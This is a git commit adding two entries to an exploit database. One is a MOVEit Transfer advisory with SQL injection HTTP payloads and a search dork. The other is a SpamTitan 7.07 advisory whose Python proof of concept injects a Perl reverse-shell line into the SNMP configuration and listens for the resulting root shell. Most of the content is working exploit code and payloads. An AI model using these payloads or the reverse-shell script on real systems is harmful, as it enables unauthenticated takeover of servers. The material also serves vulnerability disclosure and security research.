DB: 2020-10-06
2 changes to exploits/shellcodes MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection SpamTitan 7.07 - Unauthenticated Remote Code Execution
This commit is contained in:
parent
9772f1e7c0
commit
1569af9b59
3 changed files with 311 additions and 0 deletions
34
exploits/multiple/webapps/48855.txt
Normal file
34
exploits/multiple/webapps/48855.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
|
||||
# Google Dork: inurl:human.aspx intext:moveit
|
||||
# Date: 2020-10-05
|
||||
# Exploit Author: Aviv Beniash
|
||||
# Vendor Homepage: https://www.ipswitch.com/
|
||||
# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
|
||||
# CVE : CVE-2019-16383
|
||||
#
|
||||
# Related Resources:
|
||||
# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
|
||||
# https://nvd.nist.gov/vuln/detail/CVE-2019-16383
|
||||
|
||||
# Description:
|
||||
# The API call for revoking logon tokens is vulnerable to a
|
||||
# Time based blind SQL injection via the 'token' parameter
|
||||
|
||||
# MSSQL payload:
|
||||
|
||||
POST /api/v1/token/revoke HTTP/1.1
|
||||
Host: moveittransferstg
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 32
|
||||
|
||||
token='; WAITFOR DELAY '0:0:10'--
|
||||
|
||||
|
||||
# MySQL payload:
|
||||
|
||||
POST /api/v1/token/revoke HTTP/1.1
|
||||
Host: moveittransferstg
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 21
|
||||
|
||||
token=' OR SLEEP(10);
|
275
exploits/php/webapps/48856.py
Executable file
275
exploits/php/webapps/48856.py
Executable file
|
@ -0,0 +1,275 @@
|
|||
# Exploit Title: SpamTitan 7.07 - Unauthenticated Remote Code Execution
|
||||
# Date: 2020-09-18
|
||||
# Exploit Author: Felipe Molina (@felmoltor)
|
||||
# Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/
|
||||
# Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway
|
||||
# Version: 7.07
|
||||
# Tested on: FreeBSD
|
||||
# CVE : CVE-2020-11698
|
||||
|
||||
---[SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in
|
||||
snmp-x.php]------------------------------
|
||||
|
||||
SECURITY ADVISORY: SPUK-2020-09/SpamTitan Unauthenticated Remote
|
||||
Code Execution in snmp-x.php
|
||||
Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions)
|
||||
Vulnerability: Unauthenticated Remote Code Execution
|
||||
CVSSv3: 10.0
|
||||
(https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
|
||||
Severity: Critical
|
||||
Release Date: 2020-04-17
|
||||
CVE: CVE-2020-11698
|
||||
|
||||
I. Background
|
||||
~~~~~~~~~~~~~
|
||||
|
||||
From www.spamtitan.com:
|
||||
|
||||
"SpamTitan Gateway is a powerful Anti-Spam appliance that equips network
|
||||
administrators with extensive tools to control mail flow and protect against
|
||||
unwanted email and malware."
|
||||
|
||||
II. Description
|
||||
~~~~~~~~~~~~~~~
|
||||
Improper input sanitization of the parameter "community" on the page
|
||||
snmp-x.php would allow a remote attacker to inject command directives into the
|
||||
file snmpd.conf. This would allow executing commands on the target server by
|
||||
by injecting an "extend" or "exec" SNMPD directive and querying the snmp daemon
|
||||
of the server for the correct OID.
|
||||
|
||||
III. PoC
|
||||
~~~~~~~~
|
||||
|
||||
Use python 3 and install the following modules: requests, pysnmp.
|
||||
If your IP is 192.168.1.5 and the target SpamTitan server is
|
||||
spamtitan.example.com, call the PoC like this:
|
||||
./poc.py -t spamtitan.example.com -i 192.168.1.5
|
||||
|
||||
---------------------------------------------
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
# Author: Felipe Molina (@felmoltor)
|
||||
# Date: 09/04/2020
|
||||
# Python Version: 3.7
|
||||
# Summary: This is PoC for an unauthenticated RCE 0day on SpamTitan
|
||||
7.07 and previous versions.
|
||||
# The script abuses of two weaknesses on the product:
|
||||
# 1. Unauthenticated interaction with snmp-x.php script
|
||||
# 2. Injection of snmpd.conf configuration directives in multiple POST
|
||||
parameters such as "community" or "user_username" of snmp-x.php
|
||||
# Product URL: https://www.spamtitan.com/
|
||||
# Product Version: 7.07 and probably previous
|
||||
|
||||
import requests
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
import os
|
||||
import threading
|
||||
from optparse import OptionParser
|
||||
import socket
|
||||
import json
|
||||
from pysnmp.hlapi import *
|
||||
from urllib.parse import urlparse
|
||||
from time import sleep
|
||||
|
||||
SNMPGETDELAY=5
|
||||
|
||||
def parseoptions():
|
||||
parser = OptionParser()
|
||||
parser.add_option("-t", "--target", dest="target",
|
||||
help="Target SpamTitan URL to attack. E.g.:
|
||||
https://spamtitan.com/", default=None)
|
||||
parser.add_option("-i", "--ip", dest="ip",
|
||||
help="Local IP where to listen for the reverse
|
||||
shell. Default: %s" % myip(), default=myip())
|
||||
parser.add_option("-p", "--port", dest="port",
|
||||
help="Local Port where to listen for the reverse
|
||||
shell. Default: 4242", default=4242)
|
||||
parser.add_option("-q", "--quiet",
|
||||
action="store_true", dest="quiet", default=False,
|
||||
help="Shut up script! Just give me the shell.")
|
||||
|
||||
return parser.parse_args()
|
||||
|
||||
def printmsg(msg,quiet=False,msgtype="i"):
|
||||
if (not quiet):
|
||||
if (success):
|
||||
print("[%s] %s" % (msgtype,msg))
|
||||
else:
|
||||
print("[-] %s" % msg)
|
||||
|
||||
def info(msg,quiet=False):
|
||||
printmsg(msg,quiet,msgtype="i")
|
||||
|
||||
def success(msg,quiet=False):
|
||||
printmsg(msg,quiet,msgtype="+")
|
||||
|
||||
def fail(msg,quiet=False):
|
||||
printmsg(msg,quiet,msgtype="-")
|
||||
|
||||
def myip():
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
try:
|
||||
# doesn't even have to be reachable
|
||||
s.connect(('10.255.255.255', 1))
|
||||
IP = s.getsockname()[0]
|
||||
except:
|
||||
IP = '127.0.0.1'
|
||||
finally:
|
||||
s.close()
|
||||
return IP
|
||||
|
||||
|
||||
def shellServer(ip,port,quiet):
|
||||
servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
servers.bind((ip, port))
|
||||
servers.listen(1)
|
||||
info("Waiting for incoming connection on %s:%s" % (ip,port))
|
||||
conn, addr = servers.accept()
|
||||
conn.settimeout(1)
|
||||
success("Hurray, we got a connection from %s" % addr[0])
|
||||
|
||||
prompt =conn.recv(128)
|
||||
prompt=str(prompt.decode("utf-8")).strip()
|
||||
command = input(prompt)
|
||||
|
||||
while True:
|
||||
try:
|
||||
c = "%s\n" % (command)
|
||||
if (len(c)>0):
|
||||
conn.sendall(c.encode("utf-8"))
|
||||
# Quit the console
|
||||
if command == 'exit':
|
||||
info("\nClosing connection")
|
||||
conn.close()
|
||||
break
|
||||
else:
|
||||
completeanswer=""
|
||||
while True:
|
||||
answer=None
|
||||
try:
|
||||
answer=str((conn.recv(1024)).decode("utf-8"))
|
||||
completeanswer+=answer
|
||||
except socket.timeout:
|
||||
completeanswer.strip()
|
||||
break
|
||||
print(completeanswer,end='')
|
||||
command = input("")
|
||||
except (KeyboardInterrupt, EOFError):
|
||||
info("\nClosing connection")
|
||||
break
|
||||
|
||||
def triggerSNMPShell(target, community, triggeroid, port, quiet):
|
||||
if (not quiet):
|
||||
print("Waiting %s seconds to allow the main thread set-up the
|
||||
shell listener." % SNMPGETDELAY)
|
||||
# Give the parent thread a few seconds to set up the shell
|
||||
listener before triggering the SNMP get query
|
||||
sleep(SNMPGETDELAY)
|
||||
if (not quiet):
|
||||
print("Querying the SNMP server to launch the shell.")
|
||||
targetp = urlparse(target)
|
||||
errorIndication, errorStatus, errorIndex, varBinds = next(
|
||||
getCmd(SnmpEngine(),
|
||||
CommunityData(community, mpModel=0),
|
||||
UdpTransportTarget((targetp.netloc, port)),
|
||||
ContextData(),
|
||||
ObjectType(ObjectIdentity(triggeroid)))
|
||||
)
|
||||
if errorIndication:
|
||||
print("SNMP error: %s" % errorIndication)
|
||||
elif errorStatus:
|
||||
print('SNMP error status: %s at %s' % (errorStatus.prettyPrint(),
|
||||
errorIndex and varBinds[int(errorIndex) -
|
||||
1][0] or '?'))
|
||||
|
||||
def main():
|
||||
(options,arguments) = parseoptions()
|
||||
q = options.quiet
|
||||
t = options.target
|
||||
i = options.ip
|
||||
p = options.port
|
||||
community="dummy"
|
||||
|
||||
if (t is None):
|
||||
print("[-] Error. Specify a target (-t).")
|
||||
exit()
|
||||
|
||||
if ((not "http://" in t) and (not "https://" in t)):
|
||||
t = "http://%s/snmp-x.php" % t
|
||||
else:
|
||||
t = "%s/snmp-x.php" % t
|
||||
|
||||
if (not q):
|
||||
print("[+] Attacking: %s.\nReceiving shell in %s:%s" % (t,i,p))
|
||||
|
||||
TARGETOID=".1.3.6.1.4.1.8072.1.3.2.3.1.1.8.114.101.118.115.104.101.108.108"
|
||||
# PAYLOAD="extend revshell /usr/bin/perl -e 'use
|
||||
Socket;$i=\"%s\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh
|
||||
-i\");};'" % (i,p)
|
||||
PAYLOAD="extend revshell /usr/bin/perl -e 'use
|
||||
Socket;$i=\"%s\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh
|
||||
-i\");};'" % (i,p)
|
||||
TOGGLESNMP={
|
||||
"jaction":"toggleSNMP",
|
||||
"newval":"1"
|
||||
}
|
||||
INJECTION={
|
||||
"jaction":"saveAll",
|
||||
"contact":"CONTACT",
|
||||
"name":"SpamTitan",
|
||||
"location":"LOCATION",
|
||||
# Add our IP as allowed to query the injected "dummy" community
|
||||
# Add also the perl payload in a new line (%0a) of the snmpd.conf file
|
||||
"community":'%s" %s\n%s # ' % (community,i,PAYLOAD)
|
||||
}
|
||||
|
||||
rev_thread = threading.Thread(target=triggerSNMPShell, args=(t,
|
||||
community, TARGETOID, 161,q))
|
||||
rev_thread.start()
|
||||
|
||||
# Start a thread to listen for incoming reverse shells:
|
||||
if (not q):
|
||||
print("[+] Launching a reverse shell listener to wait for the shell.")
|
||||
|
||||
# Send the SNMP request to add a community and append an "extend"
|
||||
command to execute scripts
|
||||
# SpamTitan would add a new line in the snmpd.conf file with the
|
||||
new community name and the "extend" script
|
||||
inj_res = requests.post(t,INJECTION,verify=False)
|
||||
if (inj_res.status_code == 200):
|
||||
if (not q):
|
||||
print("Spawning a reverse shell listener. Wait for it...")
|
||||
shellServer(options.ip,int(options.port),options.quiet)
|
||||
else:
|
||||
print("Error. The target is probably not vulnerable (returned
|
||||
a %s code)." % inj_res.status_code)
|
||||
|
||||
main()
|
||||
|
||||
---------------------------------------------
|
||||
|
||||
III. Impact
|
||||
~~~~~~~~~~~
|
||||
|
||||
The snmpd daemon is running as root in the target server. The
|
||||
pressented PoC would return a root shell without need of any
|
||||
registered user in the target server. There is total loss of
|
||||
confidentiality, integrity and availability on the SpamTitan server.
|
||||
|
||||
IV. Disclosure
|
||||
~~~~~~~~~~~~~~
|
||||
|
||||
Reported By: Felipe Molina de la Torre
|
||||
|
||||
Vendor Informed: 2020-04-17
|
||||
Patch Release Date: 2020-05-26
|
||||
Advisory Release Date: 2019-09-18
|
||||
|
||||
V. References
|
||||
~~~~~~~~~~~~~
|
||||
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698
|
||||
* https://sensepost.com/blog/2020/clash-of-the-spamtitan/
|
||||
|
||||
---------------------------------[SPUK-2020-09/SpamTitan
|
||||
Unauthenticated Remote Code Execution in snmp-x.php]---
|
|
@ -42993,6 +42993,8 @@ id,file,description,date,author,type,platform,port
|
|||
48654,exploits/java/webapps/48654.txt,"Exhibitor Web UI 1.7.1 - Remote Code Execution",2020-07-07,"Logan Sanderson",webapps,java,
|
||||
48853,exploits/php/webapps/48853.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)",2020-10-02,bzyo,webapps,php,
|
||||
48854,exploits/php/webapps/48854.txt,"Photo Share Website 1.0 - Persistent Cross-Site Scripting",2020-10-02,Augkim,webapps,php,
|
||||
48855,exploits/multiple/webapps/48855.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-10-05,"Aviv Beniash",webapps,multiple,
|
||||
48856,exploits/php/webapps/48856.py,"SpamTitan 7.07 - Unauthenticated Remote Code Execution",2020-10-05,"Felipe Molina",webapps,php,
|
||||
48655,exploits/php/webapps/48655.php,"PHP 7.4 FFI - 'disable_functions' Bypass",2020-07-07,"hunter gregal",webapps,php,
|
||||
48656,exploits/php/webapps/48656.txt,"Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting",2020-07-09,mqt,webapps,php,
|
||||
48659,exploits/asp/webapps/48659.txt,"HelloWeb 2.0 - Arbitrary File Download",2020-07-10,bRpsd,webapps,asp,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue